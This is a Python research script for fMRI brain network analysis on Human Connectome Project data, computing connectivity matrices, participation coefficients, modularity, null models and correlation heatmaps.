def plot_corr_matrix(matrix,membership,colors,out_file=None,reorder=True,line=False,rectangle=False,draw_legend=False,colorbar=False):
"""
matrix: square, whatever you like
membership: the community (or whatever you like of each node in the matrix)
colors: the colors of each node in the matrix (same order as membership)
out_file: save the file here, will supress plotting, do None if you want to plot it.
line: draw those little lines to divide up communities
rectangle: draw colored rectangles around each community
draw legend: draw legend...
colorbar: colorbar...
"""
if reorder == True:
swap_dict = {}
index = 0
corr_mat = np.zeros((matrix.shape))
names = []
x_ticks = []
y_ticks = []
reordered_colors = []
for i in np.unique(membership):
for node in np.where(membership==i)[0]:
swap_dict[node] = index
index = index + 1
names.append(membership[node])
reordered_colors.append(colors[node])
for i in range(len(swap_dict)):
for j in range(len(swap_dict)):
corr_mat[swap_dict[i],swap_dict[j]] = matrix[i,j]
corr_mat[swap_dict[j],swap_dict[i]] = matrix[j,i]
colors = reordered_colors
membership = np.array(names)
else:
corr_mat = matrix
sns.set(style='dark',context="paper",font='Helvetica',font_scale=1.2)
std = np.nanstd(corr_mat)
mean = np.nanmean(corr_mat)
fig = sns.clustermap(corr_mat,yticklabels=[''],xticklabels=[''],cmap=sns.diverging_palette(260,10,sep=10, n=20,as_cmap=True),rasterized=True,col_colors=colors,row_colors=colors,row_cluster=False,col_cluster=False,**{'vmin':mean - (std*2),'vmax':mean + (std*2),'figsize':(15.567,15)})
ax = fig.fig.axes[4]
# Use matplotlib directly to emphasize known networks
if line == True or rectangle == True:
if len(colors) != len(membership):
colors = np.arange(len(membership))
for i,network,color, in zip(np.arange(len(membership)),membership,colors):
if network != membership[i - 1]:
if len(colors) != len(membership):
color = 'white'
if rectangle == True:
ax.add_patch(patches.Rectangle((i+len(membership[membership==network]),264-i),len(membership[membership==network]),len(membership[membership==network]),facecolor="none",edgecolor=color,linewidth="2",angle=180))
if line == True:
ax.axhline(len(membership) - i, c=color,linewidth=.5,label=network)
ax.axhline(len(membership) - i, c='black',linewidth=.5)
ax.axvline(i, c='black',linewidth=.5)
fig.ax_col_colors.add_patch(patches.Rectangle((0,0),264,1,facecolor="None",edgecolor='black',lw=2))
fig.ax_row_colors.add_patch(patches.Rectangle((0,0),1,264,facecolor="None",edgecolor='black',lw=2))
col = fig.ax_col_colors.get_position()
fig.ax_col_colors.set_position([col.x0, col.y0, col.width*1, col.height*.35])
col = fig.ax_row_colors.get_position()
fig.ax_row_colors.set_position([col.x0+col.width*(1-.35), col.y0, col.width*.35, col.height*1])
fig.ax_col_dendrogram.set_visible(False)
fig.ax_row_dendrogram.set_visible(False)
if draw_legend == True:
leg = fig.ax_heatmap.legend(bbox_to_anchor=[.98,1.1],ncol=5)
for legobj in leg.legendHandles:
legobj.set_linewidth(2.5)
if colorbar == False:
fig.cax.set_visible(False)
if out_file != None:
plt.savefig(out_file,dpi=600)
plt.close()
if out_file == None:
plt.show()
return fig
def plot_corr_matrix2(matrix,membership,reorder=True):
"""
matrix: square, whatever you like
membership: the community (or whatever you like of each node in the matrix)
colors: the colors of each node in the matrix (same order as membership)
out_file: save the file here, will supress plotting, do None if you want to plot it.
line: draw those little lines to divide up communities
rectangle: draw colored rectangles around each community
draw legend: draw legend...
colorbar: colorbar...
"""
if reorder == True:
swap_dict = {}
index = 0
corr_mat = np.zeros((matrix.shape))
names = []
x_ticks = []
y_ticks = []
for i in np.unique(membership):
for node in np.where(membership==i)[0]:
swap_dict[node] = index
index = index + 1
names.append(membership[node])
for i in range(len(swap_dict)):
for j in range(len(swap_dict)):
corr_mat[swap_dict[i],swap_dict[j]] = matrix[i,j]
corr_mat[swap_dict[j],swap_dict[i]] = matrix[j,i]
membership = np.array(names)
sns.set(style='dark',context="paper",font='Helvetica',font_scale=1.2)
std = np.nanstd(matrix)
mean = np.nanmean(matrix)
np.fill_diagonal(matrix,0.0)
fig = sns.heatmap(matrix,yticklabels=[''],xticklabels=[''],cmap=sns.diverging_palette(260,10,sep=10, n=20,as_cmap=True),rasterized=True,**{'vmin':mean - (std*2),'vmax':mean + (std*2)})
# Use matplotlib directly to emphasize known networks
for i,network in zip(np.arange(len(membership)),membership):
if network != membership[i - 1]:
fig.figure.axes[0].add_patch(patches.Rectangle((i+len(membership[membership==network]),len(membership)-i),len(membership[membership==network]),len(membership[membership==network]),facecolor="none",edgecolor='black',linewidth="2",angle=180))
sns.plt.show()
def make_static_matrix(subject,task,project,atlas,scrub=False):
hcp_subject_dir = '/home/despoB/connectome-data/SUBJECT/*TASK*/*reg*'
parcel_path = '/home/despoB/mb3152/dynamic_mod/atlases/%s_template.nii' %(atlas)
MP = None
# try:
# MP = np.load('/home/despoB/mb3152/dynamic_mod/motion_files/%s_%s.npy' %(subject,task))
# except:
# run_fd(subject,task)
# MP = np.load('/home/despoB/mb3152/dynamic_mod/motion_files/%s_%s.npy' %(subject,task))
subject_path = hcp_subject_dir.replace('SUBJECT',subject).replace('TASK',task)
if scrub == True:
subject_time_series = brain_graphs.load_subject_time_series(subject_path,dis_file=MP,scrub_mm=0.2)
brain_graphs.time_series_to_matrix(subject_time_series,parcel_path,voxel=False,fisher=False,out_file='/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_%s_matrix_scrubbed_0.2.npy' %(atlas,subject,atlas,task))
if scrub == False:
subject_time_series = brain_graphs.load_subject_time_series(subject_path,dis_file=None,scrub_mm=False)
brain_graphs.time_series_to_matrix(subject_time_series,parcel_path,voxel=False,fisher=False,out_file='/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_%s_matrix.npy' %(atlas,subject,atlas,task))
# parcel = nib.load(parcel_path).get_data().astype(int)
# g = np.zeros((np.max(parcel),subject_time_series.shape[-1]))
# for i in range(np.max(parcel)):
# g[i,:] = np.nanmean(subject_time_series[parcel==i+1],axis = 0)
def proc_figure():
hcp_subject_dir = '/home/despoB/connectome-data/SUBJECT/*TASK*/*reg*'
parcel_path = '/home/despoB/mb3152/dynamic_mod/atlases/%s_template.nii' %(atlas)
dis_file = np.load('/home/despoB/mb3152/dynamic_mod/motion_files/100307_rfMRI_REST1_LR.npy')
subject_path = hcp_subject_dir.replace('SUBJECT','100307').replace('TASK','REST1_LR')
subject_time_series = brain_graphs.load_subject_time_series(subject_path,dis_file=None,scrub_mm=False)
parcel = nib.load(parcel_path).get_data().astype(int)
# g = np.zeros((np.max(parcel),subject_time_series.shape[-1]))
# for i in range(np.max(parcel)):
# g[i,:] = np.nanmean(subject_time_series[parcel==i+1],axis = 0)
# np.save('100307_REST1LR_ts.npy',g)
# g = np.corrcoef(g)
ts = np.load('100307_REST1LR_ts.npy')
sns.set_style("white")
p = sns.color_palette("cubehelix", 8)
sns.tsplot(ts[43]-125,color=p[5])
sns.tsplot(ts[41],color=p[6])
sns.tsplot(ts[215]+180,color=p[7])
sns.plt.yticks([],[])
sns.plt.xticks([],[])
sns.despine()
sns.plt.savefig('ts_example.pdf')
plt.show()
m = []
for f in glob.glob('%s/dynamic_mod/power_matrices/*100307*REST*'%(homedir)):
if 'scrubbed' in f: continue
f = np.load(f)
np.fill_diagonal(f,0.0)
f[np.isnan(f)] = 0.0
f = np.arctanh(f)
m.append(f.copy())
m = np.nanmean(m,axis=0)
membership,network_names,num_nodes,name_int_dict = network_labels('power')
# m = np.load('/home/despoB/mb3152/diverse_club/graphs/REST.npy')
m = np.triu(m,1) + np.triu(m,1).transpose()
graph = brain_graphs.matrix_to_igraph(m.copy(),0.05,binary=False,check_tri=True,interpolation='midpoint',normalize=False,mst=True)
thresh_m = brain_graphs.threshold(m.copy(), .05, binary=False, check_tri=True, interpolation='midpoint', mst=True, test_matrix=True)
graph = graph.community_infomap(edge_weights='weight')
graph = brain_graphs.brain_graph(graph)
graph = brain_graphs.matrix_to_igraph(m,0.05,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
graph = graph.community_infomap(edge_weights='weight')
graph = brain_graphs.brain_graph(graph)
pc.append(np.array(graph.pc))
wmd.append(np.array(graph.wmd))
mod.append(graph.community.modularity)
g = graph.community.graph
g.vs['community'] = graph.community.membership
p = pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)
x,y,z = p[6],p[7],p[8]
pc = graph.pc
pc[np.isnan(pc)] = 0.0
pc = pc * 1000
pc = pc.astype(int)
wcd= graph.wmd
wcd[np.isnan(wcd)] = 0.0
wcd = wcd * 1000
wcd = wcd.astype(int)
g.vs['latitude'] = np.array(y.values)
g.vs['longitude'] = np.array(z.values)
g.vs['pc'] = np.array(pc.astype('float16'))
g.vs['wcd'] = np.array(wcd.astype('float16'))
g.write_gml('100307_viz.gml')
network_order = ['Auditory','Sensory/somatomotor Hand','Sensory/somatomotor Mouth','Visual','Dorsal attention','Ventral attention',
'Cingulo-opercular Task Control','Salience','Fronto-parietal Task Control','Default mode','Cerebellar','Subcortical','Memory retrieval?','Uncertain']
colors = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[34].values)
colors[colors=='Pale blue'] = '#ADD8E6'
colors[colors=='Teal'] = '#008080'
swap_indices = []
for nn in network_order:
original_idx = np.where(network_names == nn)
for i in range(len(original_idx[0])):
swap_indices.append(original_idx[0][i])
membership = graph.community.membership
swap_dict = {}
index = 0
corr_mat = np.zeros((m.shape))
u = np.unique(membership)
np.random.shuffle(u)
for i in u:
for node in np.where(membership==i)[0]:
swap_dict[node] = index
index = index + 1
for i in range(len(swap_dict)):
for j in range(len(swap_dict)):
corr_mat[swap_dict[i],swap_dict[j]] = m[i,j]
corr_mat[swap_dict[j],swap_dict[i]] = m[j,i]
plt_m = np.tril(m) + np.triu(thresh_m)
sns.heatmap(m[swap_indices,:][:,swap_indices],cmap="coolwarm",vmin=-1,vmax=1)
plt.xticks([], [])
plt.yticks([], [])
plt.savefig('examplematrix.pdf')
plt.show()
def null_graph_individual_graph_analyes(matrix):
cost = 0.05
temp_matrix = matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
vc = graph.community_infomap(edge_weights='weight')
temp_matrix = matrix.copy()
random_matrix = temp_matrix.copy()
random_matrix = random_matrix[np.tril_indices(264,-1)]
np.random.shuffle(random_matrix)
temp_matrix[np.tril_indices(264,-1)] = random_matrix
temp_matrix[np.triu_indices(264)] = 0.0
temp_matrix = np.nansum([temp_matrix,temp_matrix.transpose()],axis=0)
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
graph = brain_graphs.brain_graph(VertexClustering(graph,vc.membership))
return (graph.community.modularity,np.array(graph.pc),np.array(graph.wmd))
def null_community_individual_graph_analyes(matrix):
cost = 0.05
temp_matrix = matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
graph = graph.community_infomap(edge_weights='weight')
membership = graph.membership
np.random.shuffle(membership)
graph = brain_graphs.brain_graph(VertexClustering(graph.graph,membership))
return (graph.community.modularity,np.array(graph.pc),np.array(graph.wmd))
def null_all_individual_graph_analyes(matrix):
cost = 0.01
temp_matrix = matrix.copy()
random_matrix = temp_matrix.copy()
random_matrix = random_matrix[np.tril_indices(264,-1)]
np.random.shuffle(random_matrix)
temp_matrix[np.tril_indices(264,-1)] = random_matrix
temp_matrix[np.triu_indices(264)] = 0.0
temp_matrix = np.nansum([temp_matrix,temp_matrix.transpose()],axis=0)
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
graph = graph.community_infomap(edge_weights='weight')
graph = brain_graphs.brain_graph(graph)
return (graph.community.modularity,np.array(graph.pc),np.array(graph.wmd))
def individual_graph_analyes_wc(variables):
subject = variables[0]
print subject
atlas = variables[1]
task = variables[2]
s_matrix = variables[3]
pc = []
mod = []
wmd = []
memlen = []
for cost in np.array(range(5,16))*0.01:
temp_matrix = s_matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True,mst=True)
assert np.diff([cost,graph.density()])[0] < .01
del temp_matrix
graph = graph.community_infomap(edge_weights='weight')
graph = brain_graphs.brain_graph(graph)
pc.append(np.array(graph.pc))
wmd.append(np.array(graph.wmd))
mod.append(graph.community.modularity)
memlen.append(len(graph.community.sizes()))
del graph
return (mod,np.nanmean(pc,axis=0),np.nanmean(wmd,axis=0),np.nanmean(memlen),subject)
def individual_graph_analyes(variables):
subject = variables[0]
print subject
atlas = variables[1]
task = variables[2]
s_matrix = variables[3]
pc = []
mod = []
wmd = []
for cost in np.array(range(5,16))*0.01:
temp_matrix = s_matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
del temp_matrix
graph = graph.community_infomap(edge_weights='weight')
graph = brain_graphs.brain_graph(graph)
pc.append(np.array(graph.pc))
wmd.append(np.array(graph.wmd))
mod.append(graph.community.modularity)
del graph
return (mod,np.nanmean(pc,axis=0),np.nanmean(wmd,axis=0),subject)
def check_num_nodes(subjects,task,atlas='power'):
mods = []
num_nodes = []
for subject in subjects:
smods = []
snum_nodes = []
print subject
s_matrix = []
files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(atlas,subject,atlas,task))
for f in files:
f = np.load(f)
np.fill_diagonal(f,0.0)
f[np.isnan(f)] = 0.0
f = np.arctanh(f)
s_matrix.append(f.copy())
if len(s_matrix) == 0:
continue
s_matrix = np.nanmean(s_matrix,axis=0)
for cost in np.array(range(5,16))*0.01:
temp_matrix = s_matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
del temp_matrix
graph = graph.community_infomap(edge_weights='weight')
smods.append(graph.modularity)
snum_nodes.append(len(np.array(graph.graph.degree())[np.array(graph.graph.degree())>0.0]))
mods.append(np.mean(smods))
num_nodes.append(np.mean(snum_nodes))
print pearsonr(mods,num_nodes)
def participation_coef(W, ci, degree='undirected'):
'''
Participation coefficient is a measure of diversity of intermodular
connections of individual nodes.
Parameters
----------
W : NxN np.ndarray
binary/weighted directed/undirected connection matrix
ci : Nx1 np.ndarray
community affiliation vector
degree : str
Flag to describe nature of graph 'undirected': For undirected graphs
'in': Uses the in-degree
'out': Uses the out-degree
Returns
-------
P : Nx1 np.ndarray
participation coefficient
'''
if degree == 'in':
W = W.T
_, ci = np.unique(ci, return_inverse=True)
ci += 1
n = len(W) # number of vertices
Ko = np.sum(W, axis=1) # (out) degree
Gc = np.dot((W != 0), np.diag(ci)) # neighbor community affiliation
Kc2 = np.zeros((n,)) # community-specific neighbors
for i in range(1, int(np.max(ci)) + 1):
Kc2 += np.square(np.sum(W * (Gc == i), axis=1))
P = np.ones((n,)) - Kc2 / np.square(Ko)
# P=0 if for nodes with no (out) neighbors
P[np.where(np.logical_not(Ko))] = 0
return P
def check_sym():
known_membership,network_names,num_nodes,name_int_dict = network_labels('power')
tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']
for task in tasks:
print task
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %('hcp',task,'power','fz'))
for subject in subjects:
print task,subject
s_matrix = []
files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%('power',subject,'power',task))
for f in files:
f = np.load(f)
np.fill_diagonal(f,0.0)
f[np.isnan(f)] = 0.0
f = np.arctanh(f)
s_matrix.append(f.copy())
s_matrix = np.nanmean(s_matrix,axis=0)
assert (np.tril(s_matrix,-1) == np.triu(s_matrix,1).transpose()).all()
graph = brain_graphs.matrix_to_igraph(s_matrix,0.15,binary=False,check_tri=False,interpolation='midpoint',normalize=True,mst=True)
graph = brain_graphs.brain_graph(VertexClustering(graph,known_membership))
graph.pc[np.isnan(graph.pc)] = 0.0
assert np.max(graph.pc) < 1.0
assert np.isclose(graph.pc,participation_coef(np.array(graph.matrix),np.array(graph.community.membership))).all() == True
assert np.nansum(np.abs(graph.pc-participation_coef(np.array(graph.matrix),np.array(graph.community.membership)))) < 1e-10
def check_mst(subjects,task,atlas='power'):
for task in tasks:
subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %('hcp',task,atlas,'fz'))
for subject in subjects:
print subject
s_matrix = []
files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(atlas,subject,atlas,task))
for f in files:
f = np.load(f)
np.fill_diagonal(f,0.0)
f[np.isnan(f)] = 0.0
f = np.arctanh(f)
s_matrix.append(f.copy())
s_matrix = np.nanmean(s_matrix,axis=0)
assert s_matrix.shape == (264,264)
for cost in np.array(range(5,16))*0.01:
temp_matrix = s_matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=False,interpolation='midpoint',normalize=False,mst=True)
# assert np.diff([cost,graph.density()])[0] < .005
# assert graph.is_connected() == True
def check_scrubbed_normalize(subjects,task,atlas='power'):
for subject in subjects:
print subject
s_matrix = []
files = glob.glob('/home/despoB/mb3152/dynamic_mod/%s_matrices/%s_%s_*%s*_matrix_scrubbed_0.2.npy'%(atlas,subject,atlas,task))
for f in files:
dis_file = run_fd(subject,'_'.join(f.split('/')[-1].split('_')[2:5]))
remove_array = np.zeros(len(dis_file))
for i,fdf in enumerate(dis_file):
if fdf > .2:
remove_array[i] = 1
if i == 0:
remove_array[i+1] = 1
continue
if i == len(dis_file)-1:
remove_array[i-1] = 1
continue
remove_array[i-1] = 1
remove_array[i+1] = 1
if len(remove_array[remove_array==1])/float(len(remove_array)) > .75:
continue
f = np.load(f)
np.fill_diagonal(f,0.0)
f[np.isnan(f)] = 0.0
f = np.arctanh(f)
s_matrix.append(f.copy())
s_matrix = np.nanmean(s_matrix,axis=0)
assert s_matrix.shape == (264,264)
for cost in np.array(range(5,16))*0.01:
temp_matrix = s_matrix.copy()
graph = brain_graphs.matrix_to_igraph(temp_matrix,cost,binary=False,check_tri=True,interpolation='midpoint',normalize=True)
assert np.diff([cost,graph.density()])[0] < .005
def graph_metrics(subjects,task,atlas,run_version,project='hcp',run=False,scrubbed=False,homedir=homedir):
"""
run graph metrics or load them
"""
if run == False:
# done_subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %(project,task,atlas,run_version))
# assert (done_subjects == subjects).all() #make sure you are getting subjects / subjects order you wanted and ran last time.
subject_pcs = np.load('%sdynamic_mod/results/%s_%s_%s_pcs_%s.npy' %(homedir,project,task,atlas,run_version))
subject_wmds = np.load('%sdynamic_mod/results/%s_%s_%s_wmds_%s.npy' %(homedir,project,task,atlas,run_version))
subject_mods = np.load('%sdynamic_mod/results/%s_%s_%s_mods_%s.npy' %(homedir,project,task,atlas,run_version))
try:
subject_communities = np.load('%sdynamic_mod/results/%s_%s_%s_coms_%s.npy' %(homedir,project,task,atlas,run_version))
except:
subject_communities = np.load('%sdynamic_mod/results/%s_%s_%s_coms_fz_wc.npy' %(homedir,project,task,atlas))
matrices = np.load('%sdynamic_mod/results/%s_%s_%s_matrices_%s.npy' %(homedir,project,task,atlas,run_version))
thresh_matrices = np.load('%sdynamic_mod/results/%s_%s_%s_z_matrices_%s.npy' %(homedir,project,task,atlas,run_version))
finished_subjects = np.load('%sdynamic_mod/results/%s_%s_%s_subs_%s.npy' %(homedir,project,task,atlas,run_version))
elif run == True:
finished_subjects = []
variables = []
matrices = []
thresh_matrices = []
for subject in subjects:
s_matrix = []
if scrubbed == True:
files = glob.glob('%sdynamic_mod/%s_matrices/%s_%s_*%s*_matrix_scrubbed_0.2.npy'%(homedir,atlas,subject,atlas,task)) # FOR SCRUBBING ONLY
if scrubbed == False:
files = glob.glob('%sdynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(homedir,atlas,subject,atlas,task))
for f in files:
if scrubbed == True:
# FOR SCRUBBING ONLY
dis_file = run_fd(subject,'_'.join(f.split('/')[-1].split('_')[2:5]))
remove_array = np.zeros(len(dis_file))
for i,fdf in enumerate(dis_file):
if fdf > .2:
remove_array[i] = 1
if i == 0:
remove_array[i+1] = 1
continue
if i == len(dis_file)-1:
remove_array[i-1] = 1
continue
remove_array[i-1] = 1
remove_array[i+1] = 1
if len(remove_array[remove_array==1])/float(len(remove_array)) > .75:
continue
f = np.load(f)
1/0
np.fill_diagonal(f,0.0)
f[np.isnan(f)] = 0.0
f = np.arctanh(f)
s_matrix.append(f.copy())
if len(s_matrix) == 0:
continue
s_matrix = np.nanmean(s_matrix,axis=0)
variables.append([subject,atlas,task,s_matrix.copy()])
num_nodes = s_matrix.shape[0]
thresh_matrix = s_matrix.copy()
thresh_matrix = scipy.stats.zscore(thresh_matrix.reshape(-1)).reshape((num_nodes,num_nodes))
thresh_matrices.append(thresh_matrix.copy())
matrices.append(s_matrix.copy())
finished_subjects.append(subject)
subject_mods = [] #individual subject modularity values
subject_pcs = [] #subjects PCs
subject_wmds = []
subject_communities = []
assert len(variables) == len(finished_subjects)
print 'Running Graph Theory Analyses'
from multiprocessing import Pool
pool = Pool(18)
results = pool.map(individual_graph_analyes_wc,variables)
for r,s in zip(results,finished_subjects):
subject_mods.append(np.nanmean(r[0]))
subject_pcs.append(r[1])
subject_wmds.append(r[2])
subject_communities.append(r[3])
assert r[4] == s #make sure it returned the order of subjects/results correctly
np.save('%sdynamic_mod/results/%s_%s_%s_pcs_%s.npy' %(homedir,project,task,atlas,run_version),np.array(subject_pcs))
np.save('%sdynamic_mod/results/%s_%s_%s_wmds_%s.npy' %(homedir,project,task,atlas,run_version),np.array(subject_wmds))
np.save('%sdynamic_mod/results/%s_%s_%s_mods_%s.npy' %(homedir,project,task,atlas,run_version),np.array(subject_mods))
np.save('%sdynamic_mod/results/%s_%s_%s_subs_%s.npy' %(homedir,project,task,atlas,run_version),np.array(finished_subjects))
np.save('%sdynamic_mod/results/%s_%s_%s_matrices_%s.npy'%(homedir,project,task,atlas,run_version),np.array(matrices))
np.save('%sdynamic_mod/results/%s_%s_%s_coms_%s.npy' %(homedir,project,task,atlas,run_version),np.array(subject_communities))
np.save('%sdynamic_mod/results/%s_%s_%s_z_matrices_%s.npy'%(homedir,project,task,atlas,run_version),np.array(thresh_matrices))
subject_mods = np.array(subject_mods)
subject_pcs = np.array(subject_pcs)
subject_wmds = np.array(subject_wmds)
subject_communities = np.array(subject_communities)
matrices = np.array(matrices)
thresh_matrices = np.array(thresh_matrices)
results = {}
results['subject_pcs'] = subject_pcs
results['subject_mods'] = subject_mods
results['subject_wmds'] = subject_wmds
results['subject_communities'] = subject_communities
results['matrices'] = matrices
del matrices
results['z_scored_matrices'] = thresh_matrices
results['subjects'] = finished_subjects
del thresh_matrices
return results
def pc_edge_correlation(subject_pcs,matrices,path):
try:
pc_edge_corr = np.load(path)
except:
pc_edge_corr = np.zeros((subject_pcs.shape[1],subject_pcs.shape[1],subject_pcs.shape[1]))
subject_pcs[np.isnan(subject_pcs)] = 0.0
for i in range(subject_pcs.shape[1]):
for n1,n2 in combinations(range(subject_pcs.shape[1]),2):
val = pearsonr(subject_pcs[:,i],matrices[:,n1,n2])[0]
pc_edge_corr[i,n1,n2] = val
pc_edge_corr[i,n2,n1] = val
np.save(path,pc_edge_corr)
return pc_edge_corr
def pc_edge_q_figure(tasks = ['REST','WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL']):
"""
edge weight mediation of pearsonr(PC,Q) =
(regression coefficient of edge weight by PC) How much variance in the edge is explained by PC
(regression coefficient of Q by edge weight, controlling for PC) How much variance in Q is explained by the edge weight, controlling for PC.
"""
driver = 'PC'
project='hcp'
tasks = ['REST','WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL']
atlas = 'power'
run_version = 'fz'
known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
q_corr_matrix = []
pc_corr_matrix = []
#order by primary versus secondary networks.
network_order = ['Auditory','Sensory/somatomotor Hand','Sensory/somatomotor Mouth','Visual','Dorsal attention','Ventral attention',
'Cingulo-opercular Task Control','Salience','Fronto-parietal Task Control','Default mode','Cerebellar','Subcortical','Memory retrieval?','Uncertain']
colors = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[34].values)
colors[colors=='Pale blue'] = '#ADD8E6'
colors[colors=='Teal'] = '#008080'
swap_indices = []
for nn in network_order:
original_idx = np.where(network_names == nn)
for i in range(len(original_idx[0])):
swap_indices.append(original_idx[0][i])
locality_df = pd.DataFrame()
stats = []
for task in tasks:
print task
subjects = np.load('%sdynamic_mod/results/%s_%s_%s_subs_%s.npy' %(homedir,project,task,atlas,run_version))
static_results = graph_metrics(subjects,task,atlas,run_version)
subject_pcs = static_results['subject_pcs']
subject_mods = static_results['subject_mods']
subject_wmds = static_results['subject_wmds']
matrices = static_results['matrices']
assert subject_pcs.shape[0] == len(subjects)
mean_pc = np.nanmean(subject_pcs,axis=0)
mean_wmd = np.nanmean(subject_wmds,axis=0)
mod_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
mod_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_wmds.shape[1]):
mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
if driver == 'PC': m = np.load('%s/dynamic_mod/results/full_med_matrix_new_%s.npy'%(homedir,task))
else: m = np.load('%s/dynamic_mod/results/full_med_matrix_new_%s_wmds.npy'%(homedir,task))
mean_conn = np.nanmean(matrices,axis=0)
e_tresh = np.percentile(mean_conn,85)
for i in range(264):
real_t = scipy.stats.ttest_ind(np.abs(m)[i][np.argwhere(mean_conn[i]>=e_tresh)][:,:,np.arange(264)!=i].reshape(-1),np.abs(m)[i][np.argwhere(mean_conn[i]<e_tresh)][:,:,np.arange(264)!=i].reshape(-1))[0]
# real_t = scipy.stats.ttest_ind(m[i][np.argwhere(mean_conn[i]>=e_tresh)][:,:,np.arange(264)!=i].reshape(-1),m[i][np.argwhere(mean_conn[i]<e_tresh)][:,:,np.arange(264)!=i].reshape(-1))[0]
if mod_pc_corr[i] > 0.0:
locality_df = locality_df.append({"Node Type":'Connector Hub','t':real_t,'Task':task.capitalize()},ignore_index=True)
else:
locality_df = locality_df.append({"Node Type":'Local Node','t':real_t,'Task':task.capitalize()},ignore_index=True)
locality_df.dropna(inplace=True)
if driver == 'PC':
predict_nodes = np.where(mod_pc_corr>0.0)[0]
local_predict_nodes = np.where(mod_pc_corr<0.0)[0]
pc_edge_corr = np.arctanh(pc_edge_correlation(subject_pcs,matrices,path='%s/dynamic_mod/results/%s_%s_%s_pc_edge_corr_z.npy' %(homedir,project,task,atlas)))
if driver == 'WMD':
predict_nodes = np.where(mod_wmd_corr>0.0)[0]
local_predict_nodes = np.where(mod_wmd_corr<0.0)[0]
pc_edge_corr = np.arctanh(pc_edge_correlation(subject_wmds,matrices,path='%s/dynamic_mod/results/%s_%s_%s_wmd_edge_corr_z.npy' %(homedir,project,task,atlas)))
n_nodes = pc_edge_corr.shape[0]
q_edge_corr = np.zeros((n_nodes,n_nodes))
perf_edge_corr = np.zeros((n_nodes,n_nodes))
for i,j in combinations(range(n_nodes),2):
ijqcorr = nan_pearsonr(matrices[:,i,j],subject_mods)[0]
q_edge_corr[i,j] = ijqcorr
q_edge_corr[j,i] = ijqcorr
# continue
# if task not in ['WM','RELATIONAL','SOCIAL','LANGUAGE']:
# continue
# ijqcorr = nan_pearsonr(matrices[:,i,j],task_perf)[0]
# perf_edge_corr[i,j] = ijqcorr
# perf_edge_corr[j,i] = ijqcorr
pc_corr_matrix.append(np.nanmean(pc_edge_corr[predict_nodes,:,:],axis=0))
q_corr_matrix.append(q_edge_corr)
# if task in ['WM','RELATIONAL','SOCIAL','LANGUAGE']:
# print nan_pearsonr(perf_edge_corr.reshape(-1),np.nanmean(pc_edge_corr[predict_nodes,:,:],axis=0).reshape(-1))
# plot_corr_matrix(perf_edge_corr[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_edge_perf_corr_matrix.pdf'%(homedir,task,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
# plot_corr_matrix(np.nanmean(m[predict_nodes,:,:],axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_%s_mediation_matrix.pdf'%(homedir,task,driver,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
# plot_corr_matrix(np.nanmean(pc_edge_corr[predict_nodes],axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_pcedge__corr_matrix.pdf'%(homedir,task,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
# plot_corr_matrix(q_edge_corr[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_%s_qedgecorr_matrix.pdf'%(homedir,task,driver,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
plot_corr_matrix(np.nanmean(q_corr_matrix,axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_mean_q_corr_matrix.pdf'%(homedir,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
